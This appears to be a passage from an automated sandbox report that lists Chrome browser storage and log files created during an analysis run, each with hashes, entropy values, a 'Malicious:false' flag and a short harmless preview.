                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):434
                                                                                                                                                                Entropy (8bit):5.2079616022829
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:wlQ+vy5KkFFUtpgEuGKW/PgiQV5L5KkOJ:w5y5KkfgcGKmSL5KkK
                                                                                                                                                                MD5:0250667A023E9A727239F40413BF4122
                                                                                                                                                                SHA1:B9B0CA9B70630109343DBD06525D3DC9C083C6C3
                                                                                                                                                                SHA-256:F1BBB24DF40767DED9BE27AD392C11E29C14FEF3D88929267DE51EECC1F5E327
                                                                                                                                                                SHA-512:0DE0E41DA0765030964434794C688DF874FBE79F55F4A53C5B8BCA290AD41E32B886E536DF6F1CD7A575ECF196701DE06F59F944A80425B7E410EE138BB641D4
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:31.569 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:10:31.570 1eec Recovering log #3.2021/08/16-19:10:31.571 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Network Persistent Statemp (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.762700853527964
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJqjn1KKtiKnMb1KKtiVY:YHpoeS7PMVKJw1K3KnMRK3VY
                                                                                                                                                                MD5:038931FF72A0C6AA0695A404960B1B22
                                                                                                                                                                SHA1:90802F36B75C3CA70FC8CD1CF8BDFBAE0E8723A4
                                                                                                                                                                SHA-256:BEF93811AE263E2E9145A44205340015843B1D4485D084BB642EAEB500FE564C
                                                                                                                                                                SHA-512:97903821D21BB748255C29BE83BCA5BE61E0E36719050D4BB780EBC35424202A23F3ED4EE0056833E7748F1D55D82A5F38476298C5012202776BEA411DA7001E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000001.dbtmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):61
                                                                                                                                                                Entropy (8bit):3.7273991737283296
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                                MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                                SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                                SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                                SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: *...#................version.1..namespace-..&f...............
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\CURRENT (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):381
                                                                                                                                                                Entropy (8bit):5.181504084809113
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+Kdp1lLN23iKKdKusNpZQM72KLlZvE/MQL+q2PlLN23iKKdKusNpZQMxIFUv:idu5KkxLPHQ+vy5KkMFUv
                                                                                                                                                                MD5:A991A38853CB053A49FCFC51D7D7EA47
                                                                                                                                                                SHA1:6E6909EC0BDEB82B6B7A6FE729ED39807100C664
                                                                                                                                                                SHA-256:0BCA3ABDEF33369A2079D5807DB65C2687FCFAD9B3032091F5C47D8DC511D9DC
                                                                                                                                                                SHA-512:D320FA43AF97DC7E828AC3A76D0954D2F30A39D5FC50903542991ECCA0EFA8C6F32E215D996793FBFE6C786FD45DA956F77987EACCD64E7590B18CBE42319B01
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:47.686 1eec Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage since it was missing..2021/08/16-19:10:49.268 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):381
                                                                                                                                                                Entropy (8bit):5.181504084809113
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+Kdp1lLN23iKKdKusNpZQM72KLlZvE/MQL+q2PlLN23iKKdKusNpZQMxIFUv:idu5KkxLPHQ+vy5KkMFUv
                                                                                                                                                                MD5:A991A38853CB053A49FCFC51D7D7EA47
                                                                                                                                                                SHA1:6E6909EC0BDEB82B6B7A6FE729ED39807100C664
                                                                                                                                                                SHA-256:0BCA3ABDEF33369A2079D5807DB65C2687FCFAD9B3032091F5C47D8DC511D9DC
                                                                                                                                                                SHA-512:D320FA43AF97DC7E828AC3A76D0954D2F30A39D5FC50903542991ECCA0EFA8C6F32E215D996793FBFE6C786FD45DA956F77987EACCD64E7590B18CBE42319B01
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:47.686 1eec Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage since it was missing..2021/08/16-19:10:49.268 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage/MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Session Storage\MANIFEST-000001
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PGP\011Secret Key -
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):41
                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .|.."....leveldb.BytewiseComparator......
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\5705025f-b2f6-44c4-a83e-dc843ee7c0bf.tmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.762700853527964
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJqjn1KKtiKnMb1KKtiVY:YHpoeS7PMVKJw1K3KnMRK3VY
                                                                                                                                                                MD5:038931FF72A0C6AA0695A404960B1B22
                                                                                                                                                                SHA1:90802F36B75C3CA70FC8CD1CF8BDFBAE0E8723A4
                                                                                                                                                                SHA-256:BEF93811AE263E2E9145A44205340015843B1D4485D084BB642EAEB500FE564C
                                                                                                                                                                SHA-512:97903821D21BB748255C29BE83BCA5BE61E0E36719050D4BB780EBC35424202A23F3ED4EE0056833E7748F1D55D82A5F38476298C5012202776BEA411DA7001E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache\data_1
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):270336
                                                                                                                                                                Entropy (8bit):0.0012471779557650352
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:MsEllllkEthXllkl2zE:/M/xT02z
                                                                                                                                                                MD5:F50F89A0A91564D0B8A211F8921AA7DE
                                                                                                                                                                SHA1:112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
                                                                                                                                                                SHA-256:B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
                                                                                                                                                                SHA-512:BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):434
                                                                                                                                                                Entropy (8bit):5.1341619092428425
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:4GQ+vy5KkkGHArBFUtpeMGKW/PM4pQV5L5KkkGHAryJ:4G5y5KkkGgPglGKepSL5KkkGga
                                                                                                                                                                MD5:F6A2A8A8516A9DED62607BBFB155F735
                                                                                                                                                                SHA1:A80F28A94554DAC33C82A0B018658E34A48B551B
                                                                                                                                                                SHA-256:6A1D90AB5A83646552B1FAE8927251D8E8DDF11DFD4D1DBE9388D97D787968A3
                                                                                                                                                                SHA-512:5016B94A232C30563251B8C2B5039288E99C8C44C6C400E236995CFF27C0876EFFE6FF12F96B86486301F867E79885D60633F71008F94D349BC023D53D897933
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:41.830 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:11:41.832 1eec Recovering log #3.2021/08/16-19:11:41.834 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\LOG.oldx (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):434
                                                                                                                                                                Entropy (8bit):5.1341619092428425
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:4GQ+vy5KkkGHArBFUtpeMGKW/PM4pQV5L5KkkGHAryJ:4G5y5KkkGgPglGKepSL5KkkGga
                                                                                                                                                                MD5:F6A2A8A8516A9DED62607BBFB155F735
                                                                                                                                                                SHA1:A80F28A94554DAC33C82A0B018658E34A48B551B
                                                                                                                                                                SHA-256:6A1D90AB5A83646552B1FAE8927251D8E8DDF11DFD4D1DBE9388D97D787968A3
                                                                                                                                                                SHA-512:5016B94A232C30563251B8C2B5039288E99C8C44C6C400E236995CFF27C0876EFFE6FF12F96B86486301F867E79885D60633F71008F94D349BC023D53D897933
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:41.830 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/MANIFEST-000001.2021/08/16-19:11:41.832 1eec Recovering log #3.2021/08/16-19:11:41.834 1eec Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network Persistent Statemp (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):139
                                                                                                                                                                Entropy (8bit):4.762700853527964
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:YLb9N+eAXRfHDH2LS7PMVKJqjn1KKtiKnMb1KKtiVY:YHpoeS7PMVKJw1K3KnMRK3VY
                                                                                                                                                                MD5:038931FF72A0C6AA0695A404960B1B22
                                                                                                                                                                SHA1:90802F36B75C3CA70FC8CD1CF8BDFBAE0E8723A4
                                                                                                                                                                SHA-256:BEF93811AE263E2E9145A44205340015843B1D4485D084BB642EAEB500FE564C
                                                                                                                                                                SHA-512:97903821D21BB748255C29BE83BCA5BE61E0E36719050D4BB780EBC35424202A23F3ED4EE0056833E7748F1D55D82A5F38476298C5012202776BEA411DA7001E
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: {"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAASABiAgICA+P////8B":"4G","CAESABiAgICA+P////8B":"4G"}}}
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000001.dbtmp
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\000003.log
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):61
                                                                                                                                                                Entropy (8bit):3.7273991737283296
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:S8ltHlS+QUl1ASEGhTFl:S85aEFl
                                                                                                                                                                MD5:9F7EADC15E13D0608B4E4D590499AE2E
                                                                                                                                                                SHA1:AFB27F5C20B117031328E12DD3111A7681FF8DB5
                                                                                                                                                                SHA-256:5C3A5B578AB9FE853EAD7040BC161929EA4F6902073BA2B8BB84487622B98923
                                                                                                                                                                SHA-512:88455784C705F565C70FA0A549C54E2492976E14643E9DD0A8E58C560D003914313DF483F096BD33EC718AEEC7667B8DE063A73627AA3436BA6E7E562E565B3F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: *...#................version.1..namespace-..&f...............
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\CURRENT (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):381
                                                                                                                                                                Entropy (8bit):5.102076985567792
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+A1lLN23iKKdKkGckArZQM72KLlZvWMQL+q2PlLN23iKKdKkGckArZQMxIFUv:V5KkkGHAr9LPrQ+vy5KkkGHArAFUv
                                                                                                                                                                MD5:18DA57F9B111F001D794C084C1B9AA45
                                                                                                                                                                SHA1:C1C058C5C1856BFA353F06F0EA07AAA4A948C250
                                                                                                                                                                SHA-256:167C2A9B957273624110CD54E326C2D1B9CCD6E611E3DF030890E310593B4C67
                                                                                                                                                                SHA-512:661712E282D85212C158E3F702C3B0CFB2CF693EE064B3044CA343FCCF62D3FCF30F12AC5325049D52AE650D13BF5F7A7A6F94EBA4CA99D8200194B2A3476A14
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:57.402 1eec Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage since it was missing..2021/08/16-19:11:57.709 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\LOG.oldn. (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):381
                                                                                                                                                                Entropy (8bit):5.102076985567792
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+A1lLN23iKKdKkGckArZQM72KLlZvWMQL+q2PlLN23iKKdKkGckArZQMxIFUv:V5KkkGHAr9LPrQ+vy5KkkGHArAFUv
                                                                                                                                                                MD5:18DA57F9B111F001D794C084C1B9AA45
                                                                                                                                                                SHA1:C1C058C5C1856BFA353F06F0EA07AAA4A948C250
                                                                                                                                                                SHA-256:167C2A9B957273624110CD54E326C2D1B9CCD6E611E3DF030890E310593B4C67
                                                                                                                                                                SHA-512:661712E282D85212C158E3F702C3B0CFB2CF693EE064B3044CA343FCCF62D3FCF30F12AC5325049D52AE650D13BF5F7A7A6F94EBA4CA99D8200194B2A3476A14
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:11:57.402 1eec Creating DB C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage since it was missing..2021/08/16-19:11:57.709 1eec Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage/MANIFEST-000001.
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage\MANIFEST-000001
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:PGP\011Secret Key -
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):41
                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: .|.."....leveldb.BytewiseComparator......
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):328
                                                                                                                                                                Entropy (8bit):5.211626072726702
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o+I+q2PlLN23iKKdKpIFUtpvo6cdFZZmwPvoe3VkwOlLN23iKKdKa/WLJ:w+dvy5KkmFUtpg6kZ/Pgi5L5KkaUJ
                                                                                                                                                                MD5:F387532C105F78AA45E71DEDFD084DE7
                                                                                                                                                                SHA1:E9664CA8B987B7C3497E24EC43BFC048706F56AF
                                                                                                                                                                SHA-256:549543E7E34A11052474F756BB6353A038ABCE412F18BA720D17A9F80877D5EC
                                                                                                                                                                SHA-512:EEE6534A4DDE9E7C5028B306C1BE79E470A356526A42705CC143B08103A5D6AB7BD89F148B14F3B04DF08BD3A34496DD19BA59809EC39CEEEB2DB614A12094FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.131 1c78 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2021/08/16-19:10:30.135 1c78 Recovering log #3.2021/08/16-19:10:30.143 1c78 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.old (copy)
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):328
                                                                                                                                                                Entropy (8bit):5.211626072726702
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+o+I+q2PlLN23iKKdKpIFUtpvo6cdFZZmwPvoe3VkwOlLN23iKKdKa/WLJ:w+dvy5KkmFUtpg6kZ/Pgi5L5KkaUJ
                                                                                                                                                                MD5:F387532C105F78AA45E71DEDFD084DE7
                                                                                                                                                                SHA1:E9664CA8B987B7C3497E24EC43BFC048706F56AF
                                                                                                                                                                SHA-256:549543E7E34A11052474F756BB6353A038ABCE412F18BA720D17A9F80877D5EC
                                                                                                                                                                SHA-512:EEE6534A4DDE9E7C5028B306C1BE79E470A356526A42705CC143B08103A5D6AB7BD89F148B14F3B04DF08BD3A34496DD19BA59809EC39CEEEB2DB614A12094FA
                                                                                                                                                                Malicious:false
                                                                                                                                                                Reputation:low
                                                                                                                                                                Preview: 2021/08/16-19:10:30.131 1c78 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/MANIFEST-000001.2021/08/16-19:10:30.135 1c78 Recovering log #3.2021/08/16-19:10:30.143 1c78 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB/000003.log .
                                                                                                                                                                C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\pkedcjkdefgpdelpbcmbmeomcjbeemfm\LOG
                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):406
                                                                                                                                                                Entropy (8bit):5.314438233694713
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:m+VL+q2PlLN23iKKdKks8Y5JKKhdIFUtpvq1ZmwPv0klLVkwOlLN23iKKdKks8Yx:Qvy5KkkOrsFUtpi1/Pt5L5KkkOrzJ
                                                                                                                                                                MD5:4515A2824F5BF0B48951997558914454
